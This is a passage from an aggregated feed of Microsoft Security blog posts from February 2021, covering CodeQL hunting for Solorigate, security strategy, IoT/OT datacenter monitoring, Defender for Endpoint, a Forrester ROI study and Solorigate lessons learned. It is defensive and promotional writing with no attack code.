Microsoft’s contribution during Solorigate investigations reflects our commitment to a community-based sharing vision described in Githubification of InfoSec. In keeping with our vision to grow defender knowledge and speed community response to sophisticated threats, Microsoft teams have openly and transparently shared indicators of compromise, detailed attack analysis and MITRE ATT&CK techniques, advanced hunting queries, incident response guidance, and risk assessment workbooks during this incident. Microsoft encourages other security organizations that share the “Githubification” vision to open source their own threat knowledge and defender techniques to accelerate defender insight and analysis. As we have shared before, we have compiled a comprehensive resource for technical details of the attack, indicators of compromise, and product guidance at As part of Microsoft’s sweeping investigation into Solorigate, we reviewed our own environment. As we previously shared, these investigations found activity with a small number of internal accounts, and some accounts had been used to view source code, but we found no evidence of any modification to source code, build infrastructure, compiled binaries, or production environments.

A primer on CodeQL and how Microsoft utilizes it

CodeQL is a powerful semantic code analysis engine that is now part of GitHub. Unlike many analysis solutions, it works in two distinct stages. First, as part of the compilation of source code into binaries, CodeQL builds a database that captures the model of the compiling code. For interpreted languages, it parses the source and builds its own abstract syntax tree model, as there is no compiler. Second, once constructed, this database can be queried repeatedly like any other database. The CodeQL language is purpose-built to enable the easy selection of complex code conditions from the database.

One of the reasons we find so much utility from CodeQL at Microsoft is specifically because this two-stage approach unlocks many useful scenarios, including being able to use static analysis not just for proactive Secure Development Lifecycle analysis but also for reactive code inspection across the enterprise. We aggregate the CodeQL databases produced by the various build systems or pipelines across Microsoft to a centralized infrastructure where we have the capability to query across the breadth of CodeQL databases at once. Aggregating CodeQL databases allows us to search semantically across our multitude of codebases and look for code conditions that may span between multiple assemblies, libraries, or modules based on the specific code that was part of a build. We built this capability to analyze thousands of repositories for newly described variants of vulnerabilities within hours of the variant being described, but it also allowed us to do a first-pass investigation for Solorigate implant patterns similarly, quickly.

We are open sourcing several of the C# queries that assess for these code-level IoCs, and they can currently be found in the CodeQL GitHub repository. The within that repo contains detailed descriptions of each query and what code-level IoCs each one is attempting to find. It also contains guidance for other query authors on making adjustments to those queries or authoring queries that take a different tactic in finding the patterns.

GitHub will shortly publish guidance on how they are deploying these queries for existing CodeQL customers. As a reminder, CodeQL is free for open-source projects hosted by GitHub.

Our approach to finding code-level IoCs with CodeQL queries

We used two different tactics when looking for code-level Solorigate IoCs. One approach looks for particular syntax that stood out in the Solorigate code-level IoCs; the other approach looks for overall semantic patterns for the techniques present in the code-level IoCs.

The syntactic queries are very quick to write and execute while offering several advantages over comparable regular expression searches; however, they are brittle to the malicious actor changing the names and literals they use. The semantic patterns look for the overall techniques used in the implant, such as hashing process names, time delays before contacting the C2 servers, etc. These are durable to substantial variation, but they are more complicated to author and more compute-intensive when analyzing many codebases at once.

By combining these two approaches, the queries are able to detect scenarios where the malicious actor changed techniques but used similar syntax, or changed syntax but employed similar techniques. Because it’s possible that the malicious actor could change both syntax and techniques, CodeQL was but one part of our larger investigative effort.

Next steps with CodeQL

The queries we shared in this blog and described in target patterns specifically associated with the Solorigate code-level IoCs, but CodeQL also provides many other options to query for backdoor functionality and detection-evasion techniques.

These queries were relatively quick to author, and we were able to hunt for patterns much more accurately across our CodeQL databases and with far less effort to manually review the findings, compared to using text searches of source code. CodeQL is a powerful developer tool, and our hope is that this post inspires organizations to explore how it can be used to improve reactive security response and act as a compromise detection tool.

In future blog posts, we’ll share more ways that Microsoft uses CodeQL. We’ll also continue open-sourcing queries and utilities that build upon CodeQL so that others may benefit from them and further build upon them.

The post Microsoft open sources CodeQL queries used to hunt for Solorigate activity appeared first on Microsoft Security.

Becoming resilient by understanding cybersecurity risks: Part 3—a security pro’s perspective

Microsoft Malware Protection Center - Wed, 02/24/2021 - 12:00pm

In part two of this blog series on aligning security with business objectives and risk, we explored the importance of thinking and acting holistically, using the example of human-operated ransomware, which threatens every organization in every industry. As we exited 2020, the Solorigate attack highlighted how attackers are continuously evolving. These nation-state threat actors used an organization’s software supply chain against them, with the attackers compromising legitimate software and applications with malware that installed into target organizations.

In part three of this series, we will further explore what it takes for security leaders to pivot their program from looking at their mission as purely defending against technical attacks to one that focuses on protecting valuable business assets, data, and applications. This pivot will enable business and cybersecurity leaders to remain better aligned and more resilient to a broader spectrum of attack vectors and attacker motivations.

What problem do we face?

First, let’s set a quick baseline on the characteristics of human-operated cyberattacks.

This diagram depicts commonalities and differences between for-profit ransomware and espionage campaigns:

Figure 1: Comparison of human-operated attack campaigns.

Typically, the attackers are:

  • Flexible: Utilize more than one attack vector to gain entry to the network.
  • Objective driven: Achieve a defined purpose from accessing your environment. This could be specific to your people, data, or applications, but you may also just fit a class of targets like “a profitable company that is likely to pay to restore access to their data and systems.”
  • Stealthy: Take precautions to remove evidence or obfuscate their tracks (though at different investment and priority levels, see figure one)
  • Patient: Take time to perform reconnaissance to understand the infrastructure and business environment.
  • Well-resourced and skilled in the technologies they are targeting (though the depth of skill can vary).
  • Experienced: They use established techniques and tools to gain elevated privileges to access or control different aspects of the estate (which grants them the privileges they need to fulfill their objective).

There are variations in the attack style depending on the motivation and objective, but the core methodology is the same. In some ways, this is analogous to the difference between a modern electric car versus a “Mad Max” style vehicle assembled from whatever spare parts were readily and cheaply available.

What to do about it?

Because human attackers are adaptable, a static technology-focused strategy won’t provide the flexibility and agility you need to keep up with (and get ahead of) these attacks. Historically, cybersecurity has tended to focus on the infrastructure, networks, and devices—without necessarily understanding how these technical elements correlate to business objectives and risk.

By understanding the value of information as a business asset, we can take concerted action to prevent compromise and limit risk exposure. Take email, for example, every employee in the company typically uses it, and the majority of communications have limited value to attackers. However, it also contains potentially highly sensitive and legally privileged information (which is why email is often the ultimate target of many sophisticated attacks). Categorizing email through only a technical lens would incorrectly categorize email as either a high-value asset (correct for those few very important items, but impossible to scale) or a low-value asset (correct for most items, but misses the “crown” jewels in email).

Figure 2: Business-centric security.

Security leaders must step back from the technical lens, learn what assets and data are important to business leaders, and prioritize how teams spend their time, attention, and budget through the lens of business importance. The technical lens will be re-applied as the security, and IT teams work through solutions, but looking at this only as a technology problem runs a high risk of solving the wrong problems.

It is a journey to fully understand how business value translates to technical assets, but it’s critical to get started and make this a top priority to end the eternal game of ‘whack-a-mole’ that security plays today.

Security leaders should focus on enabling this transformation by:

  1. Aligning the business in a two-way relationship:
  • Communicate in their language: explain security threats in business-friendly language and terminology that helps to quantify the risk and impact to the overall business strategy and mission.
  • Participate in active listening and learning: talk to people across the business to understand the important business services and information and the impact if that were compromised or breached. This will provide clear insight into prioritizing the investment in policies, standards, training, and security controls.
  1. Translating learnings about business priorities and risks into concrete and sustainable actions:
  • Short term focus on dealing with burning priorities:
    • Protecting critical assets and high-value information with appropriate security controls (that increases security while enabling business productivity)
    • Focus on immediate and emerging threats that are most likely to cause business impact.
    • Monitoring changes in business strategies and initiatives to stay in alignment.
  • Long term set direction and priorities to make steady progress over time, to improve overall security posture:
    • Zero Trust: Create a clear vision, strategy, plan, and architecture for reducing risks in your organization aligned to the zero trust principles of assuming breach, least privilege, and explicit verification. Adopting these principles shifts from static controls to more dynamic risk-based decisions that are based on real-time detections of anomalous behavior irrespective of where the threat derived.
    • Burndown technical debt as a consistent strategy by operating security best practices across the organization such as replacing password-based authentication with passwordless and multi-factor authentication (MFA), applying security patches, and retiring (or isolating) legacy systems. Just like paying off a mortgage, you need to make steady payments to realize the full benefit and value of your investments.
    • Apply data classifications, sensitivity labels, and role-based access controls to protect data from loss or compromise throughout its lifecycle. While these can’t completely capture the dynamic nature and richness of business context and insight, they are key enablers to guide information protection and governance, limiting the potential impact of an attack.
  1. Establishing a healthy security culture by explicitly practicing, communicating, and publicly modeling the right behavior. The culture should focus on open collaboration between business, IT, and security colleagues and applying a ‘growth mindset’ of continuous learning. Culture changes should be focused on removing siloes from security, IT, and the larger business organization to achieve greater knowledge sharing and resilience levels.

You can read more on Microsoft’s recommendations for security strategy and culture here.

In the next blog of the series, we will explore the most common attack vectors, how and why they work so effectively, and the strategies to mitigate evolving cybersecurity threats.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Becoming resilient by understanding cybersecurity risks: Part 3—a security pro’s perspective appeared first on Microsoft Security.

Microsoft listed as a Representative Vendor in 2020 Gartner Market Guide for Insider Risk Management Solutions

Microsoft Malware Protection Center - Tue, 02/23/2021 - 12:00pm

While organizations have long prioritized external cybersecurity risks, many have not paid enough attention to the risks posed by trusted insiders in their organizations. This is a mistake. Insiders often already have access to sensitive data, and the risks, whether malicious or inadvertent, can potentially cause greater damage than external cybersecurity risks.

Two years ago, after a conversation with our Chief Information Security Officer (CISO), Bret Arsenault, we embarked upon an incredible journey developing Insider Risk Management in Microsoft 365, which organizations could use to identify and manage insider risks.

In recognition of these investments, I am announcing that Gartner has listed Microsoft as a Representative Vendor in the 2020 Market Guide for Insider Risk Management Solutions. To us, this recognition reinforces our leadership in delivering an innovative solution that allows organizations to quickly identify and collaboratively manage insider risks while maintaining employee privacy.

According to Gartner, “security and risk management leaders need an insider threat mitigation program that is composed of people, processes and technology.”

A few learnings from the report:
  • The number of incidents has increased by a staggering 47 percent in just two years, from 3,200 in 2018 to 4,700 in 2020.
  • Organizations impacted by insider threats spent an average of $11.45 million in 2020—up 31 percent from $8.76 million in 2018.
  • More than 60 percent of reported insider threat incidents were the result of a careless employee or contractor, and 23 percent were caused by malicious insiders.

We continue to work closely with our customers to gather feedback to help us build better products. Your input provides critical insights as we strive to enrich our Insider Risk Management solution to help you on your journey in identifying and managing insider risks.

For more details about our information archiving solution, visit our website. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Gartner, Market Guide for Insider Risk Management Solutions, 29 December 2020, Jonathan Care, Brent Predovich, Paul Furtado.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Microsoft listed as a Representative Vendor in 2020 Gartner Market Guide for Insider Risk Management Solutions appeared first on Microsoft Security.

Securing Azure datacenters with continuous IoT/OT monitoring

Microsoft Malware Protection Center - Mon, 02/22/2021 - 2:00pm

Figure 1: Industrial cooling system for datacenters.

As more intelligent devices and machinery become connected to the internet, Operational Technology (OT) and the Internet of Things (IoT) have become part of your enterprise network infrastructure—and a growing security risk. With every new factory sensor, wind turbine monitoring device, or smart building, the attack surface grows. Analysts estimate that there will be 37 billion industrial IoT (IIoT) devices by 2025. Even more alarming for business leaders, Gartner predicts that 75 percent of CEOs will be personally liable for cyber-physical incidents by 2024.

We’ve spent 15 to 20 years adding layers of telemetry and monitoring for IT security. However, most chief information security officers (CISOs) and security operations center (SOC) teams have little or no visibility into their OT risk. It’s clear that a new approach is needed, one that includes IoT and OT-specific incident response and best practices for bringing the two teams together to defend against increasingly sophisticated cyber threats.

A changing threat landscape

In every area of our lives, cyber-physical systems (CPS) go mostly unseen as they quietly monitor building automation, industrial robots, gas pipelines, HVAC systems, turbines, automated warehousing and logistics systems, and other industrial systems. In the past, OT risk was minimized because of “air-gapping” meaning, a physical divide was maintained between OT and IT networks. But digital transformation has disrupted all that. Now devices in the warehouse, refinery, and factory floor are connected directly to corporate IT networks and often to the internet.

Microsoft offers end-to-end IoT security solutions for new, or “greenfield,” IoT deployments, but most of today’s IoT and OT devices are still considered “unmanaged” because they’re not provisioned, tracked in a configuration management database (CMDB), or consistently monitored. These devices typically don’t support agents and lack built-in security such as strong credentials and automated patching—making them soft targets for adversaries looking to pivot deeper into corporate networks.

For OT security, the key priorities are safety and availability. Production facilities need to be up and running to keep generating revenue. However, beyond revenue losses, there’s a risk for catastrophic damage and possible loss of life when OT systems are breached. And like IT attacks, an OT breach also poses a risk for theft of intellectual property (IP). According to the Verizon Data Breach Investigations Report (DBIR), manufacturers are eight times more likely to be breached for theft of IP. OT security translates directly into three main types of business risks:

  • Revenue impact: In 2017, WannaCry malware shut down major automotive manufacturers and affected more than 200,000 computers across 150 countries, with damages ranging into billions of dollars. The same year, NotPetya ransomware nearly shut down the mighty Maersk shipping company and several CPG companies. The attack crippled Merck’s production facilities resulting in losses of $1.3 billion. Last year, LockerGoga shut down the systems of Norwegian aluminum manufacturing company Norsk Hydro and several other plants. In 2020, Ekans (snake spelled backward) ransomware became the latest OT threat by specifically shutting down industrial control systems (ICS).
  • IP theft: IP includes proprietary manufacturing processes, formulas, designs, and more. In one instance, Microsoft Security Response Center (MSRC) discovered hackers were compromising vulnerable IoT devices using their default credentials. Once inside, the hackers scanned the network to see what other systems they could access to get sensitive IP. One in five North American-based corporations reports that they have had IPs stolen within the last year.
  • Safety risks: The Triton attack on a petrochemical facility targeted safety controllers with the intent to cause major structural damage and possible loss of life. The attackers gained a foothold in the IT network then used living-off-the-land (LOTL) tactics to gain remote access to the OT network, where they deployed their purpose-built malware. As this attack demonstrated, increased connectivity between IT and OT networks gives adversaries new avenues of attack for compromising unmanaged OT devices.

The U.S. Cybersecurity and Infrastructure Agency (CISA) reports that adversaries are still using many of the tactics seen in the Triton cyberattack to compromise embedded devices in OT systems. CISA has issued three basic recommendations for securing OT:

  1. Create an up-to-date, detailed inventory and map of your OT network.
  2. Use the asset inventory or map to prioritize risks, such as unpatched systems, unauthorized connections between subnets, or unauthorized connections to the internet.
  3. Implement continuous monitoring with anomaly detection.
Azure datacenters—a strategic resource

Through our cloud, Microsoft serves more than a billion customers and more than 20 million businesses across 60 regions worldwide. Today we help secure more than 400,000 customers across 120 countries. These range from small businesses to large enterprises, with 90 of the Fortune 100 using four or more of our security, compliance, identity, and management solutions. Our SOCs process 8 trillion global signals daily. Datacenters are the building blocks of the Cloud, and Microsoft has been building datacenters for more than 30 years. Microsoft datacenters constitute a complex industrial-scale facility sitting at the intersection of operational technologies (OT) and information technologies (IT). This includes industrial control systems managing the climate, power and water, physical security systems, diverse MS and non-MS personnel managing the servers and equipment, various networks including LAN and WAN and WiFi, and diverse software tools. Exclusively leveraging IT security solutions is insufficient to secure datacenters because OT systems have a long lifespan, implement network segregation, rely on proprietary protocols, and patching can disrupt operations leading to safety risks.

Figure 2: Microsoft datacenters.

The biggest risks in securing complex heterogeneous datacenter environments and generations are lack of visibility into the full datacenter stack, and IR plans and playbooks across OT and IT. To address this, we have implemented an end-to-end security monitoring system using Azure Defender for IoT and Azure Sentinel while integrating with Microsoft’s central SOC.

To strengthen its data centers’ operational resiliency worldwide, Microsoft’s Azure data center security team selected CyberX’s purpose-built IoT and OT cybersecurity platform in mid-2019. Microsoft subsequently acquired CyberX in June 2020 and recently released Azure Defender for IoT, which is based on CyberX’s agentless security platform.

Incorporating IoT and OT-aware behavioral analytics and threat intelligence, Azure Defender for IoT delivers continuous IoT and OT asset discovery, vulnerability management, and threat detection. As a Network Detection and Response (NDR) platform that uses passive monitoring and Network Traffic Analysis (NTA), it has zero performance impact on the OT network.

Azure Defender for IoT is now deeply integrated with Azure Sentinel and is available for on-premises, Azure-connected, and hybrid environments. By using both Azure Defender for IoT and Azure Sentinel as a unified, end-to-end IT and OT security solution, the Azure datacenter security team has been able to reduce complexity and prevent gaps that can lead to vulnerabilities.

Figure 3: Microsoft datacenters: Ingestion, detection, and investigation.

How it works

Azure Sentinel processes alert both from IT and OT, including from Azure Defender for IoT for OT devices such as HMIs, PLCs, biometrics, and badge readers and IT devices such as physical hosts, firewalls, virtual machines, routers, and more. All information is integrated with our incident-response system and our central SOC (including OT and IT playbooks) where machine learning reduces false positives and makes our alerts richer—creating a feedback loop with Azure Sentinel, which further refines and improves our alerting capabilities.

Microsoft datacenter security monitoring and response:

  • Improves the quality of critical environment inventory for risk-based analysis.
  • Correlates significant security events across multiple sources.
  • Advances detections across industrial control system (ICS) networks for known malware, botnet, and command/control traffic.
  • Enables machine learning support for insider threat-detection via user and entity behavior analytics (UEBA).
  • Deploys OT and IT incident-response playbooks using Azure Logic Apps integrated with Microsoft SOC. For example, we implement OT and IT playbooks for scenarios like ransomware or malware, botnet, insider threat, and untracked data-bearing devices.
  • Detects anomalous activity while reducing noise.

In addition, the Microsoft cloud security stack—Microsoft Threat Intel Center (MSTIC) is being expanded with OT capabilities and threat intel.

OT and IT: Bridging the cultural divide

OT and IT have traditionally worked on separate sides of the air gap as laid out in the Purdue Model. But as I mentioned at the top, that physical divide has vanished into the cloud. Thinking in terms of an IT and OT persona that enables both teams to collaborate seamlessly is the security challenge for our time. Here are a few insights that can help bridge the gap:

  • Mature and boost IT security practices for OT: Patching an OT system isn’t the same as updating IT; there can be dangerous repercussions in the form of factory downtime or safety risks. Empathy is important; the liberties enjoyed in the IT world can’t be blindly applied on OT. However, don’t throw away IT security best practices—boost them with OT capabilities.
  • Embrace the security journey: Whether you’re in OT or IT, security improvements move like a dial, not a switch. Agree on your guiding principles and tenants, then constantly improving collaboration between OT and IT teams.
  • Understand the OT persona: IT teams should get to know what a day in the life of an OT person looks like. Our team shadowed OT activity by making site visits, which helped build understanding and establish working relationships.
  • Appreciate the other team’s priorities: When working with OT, this means understanding the importance of safety and availability. What might be a simple system patch in IT could cause downtime or a safety issue in OT. Establish a common vocabulary and metrics to work out issues together.
  • Acknowledge preconceptions: OT often feels like the IT security approach will cause disruptions and downtime, leading to audits, escalations, or worse. For that reason, our approach became: “Hey, we found a problem. Let’s solve it together.”
  • Be proactive versus reactive: Do security assessments together and keep the right people in the loop. Set up two-way trainings, such as joint tabletop or red team exercises, and plan for “worst day” scenarios. Create dedicated websites and SharePoint sites where people can reach out with confidence that their concerns will be addressed.

For more information on securing smart buildings and bridging the IT and OT gap, watch my SANS webinar presentation titled “Securing Building Automation & Data Centers with Continuous OT Security Monitoring.”

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Securing Azure datacenters with continuous IoT/OT monitoring appeared first on Microsoft Security.

What we like about Microsoft Defender for Endpoint

Microsoft Malware Protection Center - Mon, 02/22/2021 - 12:00pm

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA 

It’s no secret that the security industry generally likes Microsoft Defender for Endpoint. After a few months of using and integrating it with our platform here at Expel, we feel the same.

On Expel’s EXE Blog, we regularly share our thought process on how we think about security operations at scale at Expel and the decision support (or additional context) we provide our analysts through automation.

In short, Defender for Endpoint makes it easy for us to achieve our standard of investigative quality and response time, but it doesn’t require a heavy lift from our analysts. And that’s good news both for our customers and for us.

So, what is Microsoft Defender for Endpoint?

Defender for Endpoint is an enterprise endpoint security product that supports Mac, Linux, and Windows operating systems, along with Android and iOS. There are lots of cool things that Defender for Endpoint does at an administrative level (such as attack surface reduction and configurable remediation). However, from our vantage point, we know it best for its detection and response capabilities.

Defender for Endpoint is unique because not only does it combine an Endpoint Detection and Response (EDR) and AV detection engine into the same product, but for Windows 10 hosts, this functionality is built into the operating system, removing the need to install an endpoint agent.

With an appropriate Microsoft license, Defender for Endpoint and Windows 10 provide out-of-the-box protection without the need to mass-deploy software or provision sensors across your fleet.

How EDR tools help us as an XDR vendor

When we integrate with an EDR product like Defender for Endpoint in support of our customers, our goal is to predict the investigative questions that an analyst will ask and then automate the action of getting the necessary data from that tool.

This frees up our analysts to make the decision—versus making them spend time extracting the right data.

We think Defender for Endpoint provides the right toolset that helps us reach that goal—and removes some burden from our analysts—thanks to its APIs.

Thanks to Defender for Endpoint’s robust APIs, we augmented its capability to provide upfront decision support to our analysts. As a result, we’re able to arm them with the answers to the basic investigative questions we ask ourselves with every alert.

To find these answers, there are a few specific capabilities of Defender for Endpoint we use that allow us to pull this information into each alert:

  • Advanced hunting database.
  • Prevalence information.
  • Detailed process logging.
  • AV actions.

This way, our analysts don’t need to worry about fiddling with the tool but instead focus on analyzing the rich data it provides.

Check out a real-life example of how Expel analysts use Defender for Endpoint to triage an alert on behalf of a customer.

Defender for Endpoint helps reduce our alert-to-fix time

The decision support—or additional context about an alert—that Defender for Endpoint enables us to generate is powerful because it allows us to become specialists at analysis rather than specialists of a specific technology.

Defender for Endpoint provides a platform that allows our analysts to quickly and accurately answer important questions during an investigation.

Most importantly, though, having these capabilities emulated in the API allowed us to build on top of the Defender for Endpoint platform to be more efficient in providing high-quality detection and response.

And that’s a win-win for both Expel and our customers.

Learn more

To learn more about Expel, visit our listing on the Azure Marketplace.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website, where you can learn about the MISA program, product integrations and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post What we like about Microsoft Defender for Endpoint appeared first on Microsoft Security.

Forrester Consulting TEI Study: Azure Security Center delivers 219 percent ROI over 3 years and a payback of less than 6 months

Microsoft Malware Protection Center - Thu, 02/18/2021 - 12:00pm

Azure Security Center is a critical tool to secure our multi-cloud workloads in the new world of remote work we find ourselves in today. We are excited to share that Forrester Consulting has just conducted a commissioned Total Economic Impact (TEI) study on behalf of Microsoft, which involved interviewing existing customers to create an accessible framework for organizations to evaluate the financial impact of Azure Security Center. The results are big—Azure Security Center delivers 219 percent return on investment (ROI) over three years and a payback of less than six months; reduces the risk of a cloud security breach by up to 25 percent, reduces time to threat mitigation by 50 percent, and reduces the cost of third-party security tools and services from consolidation by over $200,000 annually.

The Forrester study concluded that Azure Security Center reduces threat protection costs at scale, simplifies security posture management, and improves the efficiency and effectiveness of the Security Operations Center (SOC).

Forrester found that a composite organization experienced benefits of $3.56 million over three years versus costs of $1.1 million. This adds up to an ROI of 219 percent with payback in less than six months.

Cost Savings

Prior to using Azure Security Center, the customers were relying on multiple third-party cloud security tools implemented in different organizational siloes to understand their security posture and defend against potential threats. However, the distributed and disintegrated nature of this approach introduced inefficiencies into security workflows, produced a plethora of false-positive threat alerts, and limited visibility of the organization’s overall security posture, leading to potential security risk.

After the investment in Azure Security Center, the customers’ visibility into the security posture of their Azure workloads increased substantially, reducing the risk of cloud security breaches while also improving the productivity of security teams responsible for threat detection and remediation and security policy and regulatory compliance.

Forrester found that an organization experienced benefits of $3.56 million over three years versus costs of $1.1 million. This adds up to an ROI of 219 percent with payback in less than six months.

“We thought that if we could replace third-party tools with integrated Azure functionality, it might improve visibility. It might catch additional threats. It might ease configuration work, reducing management overhead in the end.”—IT security manager, professional services ¹

Reducing risk factors and time to respond

Forrester interviewed four customers with experience using Azure Security Center and aggregated the experiences of the interviewed customers, and combined the results into a single composite organization. This framework helps identify the cost, benefit, flexibility, and risk factors that affect the investment decision. According to aggregated data, Azure Security Center demonstrated strong benefits such as:

  • Reduced risk of a cloud security breach by up to 25 percent. By improving visibility into an organization’s security posture across all its Azure workloads and decreasing time to threat remediation, interviewed organizations shared that they were able to reduce the risk of cloud security breaches.
  • Reduced time to threat mitigation by 50 percent. Organizations that chose to also deploy Azure Defender within Azure Security Center shared that they were able to decrease their mean time to threat remediation by 50 percent. They were also able to reduce the number of threats needing remediation by 86 percent, thanks to false-positive threat alert reduction. Customers also benefitted from the fact that Microsoft’s scale and telemetry data enables Azure Security Center to update security recommendations and notify of important threats at speed.
  • Reduction in time spent on security policy and compliance management up to 30 percent. Azure Security Center also reduced the amount of time spent on updating security policies and on compliance-related workflows by between 20 percent and 30 percent. This resulted in the improved productivity of security administrators.
  • Reduced cost of third-party security tools and services from consolidation by over $200,000 annually. Customers shared that they reduced their spending and reliance on third-party security tools and services. Customers saved 20 percent to 30 percent on third-party security tools, reduced third-party security services by $180,000, and reduced third-party penetration test services by 50 percent.
  • Reduced risk of non-compliance. Customers improved their compliance posture with the added visibility and accessibility of regulatory compliance status through Azure Security Center. They were also able to make recommended fixes to improve compliance they might have otherwise missed.

“Whenever we got a vulnerability report, we’d have a hard time hunting down who was responsible to make sure they would remediate the issue. With Azure Security Center, our teams have full visibility into vulnerabilities, and the recommendations that are applicable to them.”—Cloud Security Specialist, Retail ¹

Protect your hybrid cloud workloads today

You can start monitoring your security posture for free using Azure Security Center today. Microsoft recommends protecting all your hybrid cloud workloads with Azure Defender. You can try Azure Defender free for 30 days. Then pay as you go for the workload protection you choose.

Download the full Forrester Consulting study, The Total Economic Impact of Azure Security Center. Get started and learn more about Azure Security Center and Azure Defender. To develop a proof of concept study, please visit our POC guide.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

¹ Customer quotes shared in this blog are anonymous as they are part of the Forrester Consulting Total Economic Impact of Azure Security Center study.

The post Forrester Consulting TEI Study: Azure Security Center delivers 219 percent ROI over 3 years and a payback of less than 6 months appeared first on Microsoft Security.

Turning the page on Solorigate and opening the next chapter for the security community

Microsoft Malware Protection Center - Thu, 02/18/2021 - 11:00am

The recent Solar Winds attack is a moment of reckoning. Today, as we close our own internal investigation of the incident, we continue to see an urgent opportunity for defenders everywhere to unify and protect the world in a more concerted way. We also see an opportunity for every company to adopt a Zero Trust plan to help defend against future attacks. 

The Microsoft Security Research Center (MSRC), which has shared learnings and guidance throughout the Solorigate incident, confirmed today that following the completion of our internal investigation we’ve seen no evidence that Microsoft systems were used to attack others. There was also no evidence of access to our production services or customer data.  

However, a concerning aspect of this attack is that security companies were a clear target. Microsoft, given the expansive use of our productivity tools and leadership in security, of course was an early target. 

But while this highly-sophisticated nation state actor was able to breach the gate, they were met by a unified team of human and digital defenders. There are several reasons why we were able to limit the scope and impact of this incident for our company, customers, and partners, but ultimately, they all boil down to a few fundamental ways we approach security.  

We believe these approaches represent an opportunity for all IT and security teams as we collectively navigate a rapidly evolving and sophisticated threat landscape.  

Adopt a Zero Trust mindset

A key action is implementing a Zero Trust architecture. In this approach, companies must assume all activity—even by trusted users—could be an attempt to breach systems, and everything a company does should be designed around that assumption.  

To guard against these pervasive threats, it’s recommended that organizations deploy zero-trust architecture and defense-in-depth protections, installing defenses like a layer cake across code, coding tools, email, cloud apps, endpoints, identities, the developer community, defender products—everything. 

Zero Trust is a proactive mindset. When every employee at a company assumes attackers are going to land at some point, they model threats and implement mitigations to ensure that any potential exploit can’t expand. The value of defense-in-depth is that security is built into key areas an actor might try to break, beginning at the code level and extending to all systems in an end-to-end way.  

Customer Guidance: As companies think about deploying a zero-trust posture and making a transition from implicit trust to explicit verification, the first step to consider is protecting identities, especially privileged user accounts. Gaps in protecting identities (or user credentials), like weak passwords or lack of multifactor authentication, are opportunities for an actor to find their way into a system, elevate their status, and move laterally across the environments targeting email, source code, critical databases and more. We witnessed this in Solorigate when abandoned app accounts with no multi-factor authentication were used to access cloud administrative settings with high privilege. To explore protecting privileged identity and access, companies should review our post on Securing privileged access overview | Microsoft Docs

Embrace the cloud

We were also reminded of the importance of cloud technology over on-premises software. Cloud technologies like Microsoft 365, Azure, and the additional premium layers of services available as part of these solutions, improve a defender’s ability to protect their own environment.  

Baseline layers of protection are not enough for today’s sophisticated threats. Defense strategies must match up to these increasingly sophisticated attacks while factoring in the complexities of securing a remote workforce. If you are not thinking about advanced layers of protection that can detect, alert, prevent and respond to attacks across identities, email, cloud apps, and endpoints, you may be locking a door while leaving the window open. From Microsoft, consider technologies like Azure Active Directory and Microsoft 365 Defender

One of the most important pieces of guidance for any security posture that we can share right now is to layer up, no matter who your security vendors are. 

In addition, with the Microsoft cloud, customers benefit from industry-leading threat intelligence, powerful AI, machine learning, and defense-in-depth capabilities that most companies simply could not develop on their own. Our platform and services assess over eight trillion security signals every day, enabling Microsoft to take more of the work off a defender’s plate. Our technology can surface and correlate security alerts that could represent a larger issue or remediate issues on demand with our own threat experts. As an example, in 2020 over 30 billion email threats were blocked by Microsoft cloud technology. 

Customer Guidance: One of the things our customers should consider is managing identity and access from the cloud. When you rely on on-premises services, like authentication server, it is up to a customer to protect their identity infrastructure. With a cloud identity, like Azure Active Directory, we protect the identity infrastructure from the cloud. Our cloud-scale machine learning systems reason over trillions of signals in real time. So, we can detect and remediate attacks that nobody else can see. 

Strengthen the community of defenders

Finally, we know that we all have an important role to play in strengthening and empowering the defender community at large. It was great to see this sharing in action in December when FireEye first alerted the community of a “global intrusion campaign.”  

At Microsoft, communicating and collaborating with our customers and partners is a top priority. Over the past several weeks, security teams across Microsoft (Microsoft Threat Intelligence Center/MSTIC, Microsoft Detection and Response Team/DART, Microsoft Cyber Defense Operations Center/CDOC and Microsoft Security Response Center/MSRC) met daily and directly collaborated with customers and partners to share information and respond. We shared the latest threat intelligence, indicators of compromise (IOC), published more than 15 blogs with technical guidance and best practices, and notified customers of potentially related activity. We also offered security trials across our end-to-end product portfolio to give organizations the tools needed to combat this threat.  

This sharing is invaluable to the entire community.  

Customer Guidance: We encourage every company, of every size, to work with the community to share information, strengthen defenses and respond to attacks. Join our Microsoft Security and Compliance Tech Community to start or participate in a variety of community discussions. 

Security is a journey of progress over perfection, and with these three approaches working in unison, we can all help to make the world more safe and secure. 

The post Turning the page on Solorigate and opening the next chapter for the security community appeared first on Microsoft Security.

6 strategies to reduce cybersecurity alert fatigue in your SOC

Microsoft Malware Protection Center - Wed, 02/17/2021 - 2:00pm

